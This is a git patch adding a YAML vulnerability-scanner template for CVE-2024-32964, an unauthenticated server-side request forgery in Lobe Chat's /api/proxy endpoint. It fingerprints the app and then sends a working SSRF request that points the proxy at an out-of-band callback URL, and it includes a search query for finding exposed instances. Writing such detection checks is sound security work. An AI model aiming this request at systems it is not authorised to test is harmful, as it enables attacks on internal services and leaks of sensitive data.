From f87d18da0db36a06d96f29437f29d17e05076cd3 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 1 Oct 2024 00:24:49 +0300 Subject: [PATCH] add CVE-2024-32964 --- http/cves/2024/CVE-2024-32964.yaml | 58 ++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 http/cves/2024/CVE-2024-32964.yaml diff --git a/http/cves/2024/CVE-2024-32964.yaml b/http/cves/2024/CVE-2024-32964.yaml new file mode 100644 index 0000000000..9ef181b76f --- /dev/null +++ b/http/cves/2024/CVE-2024-32964.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-32964 + +info: + name: Lobe Chat <= v0.150.5 - SSRF + author: s4e-io + severity: critical + description: | + Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-32964 + - https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37 + - https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc + - https://vulert.com/vuln-db/CVE-2024-32964 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H + cvss-score: 9 + cve-id: CVE-2024-32964 + cwe-id: CWE-918 + epss-score: 0.00043 + epss-percentile: 0.09599 + metadata: + verified: true + max-request: 2 + vendor: lobehub + product: lobe-chat + fofa-query: icon_hash="1975020705" + tags: cve,cve2024,lobechat,ssrf + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /welcome HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Welcome to LobeChat")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /api/proxy HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/plain + + http://{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol + words: + - "http"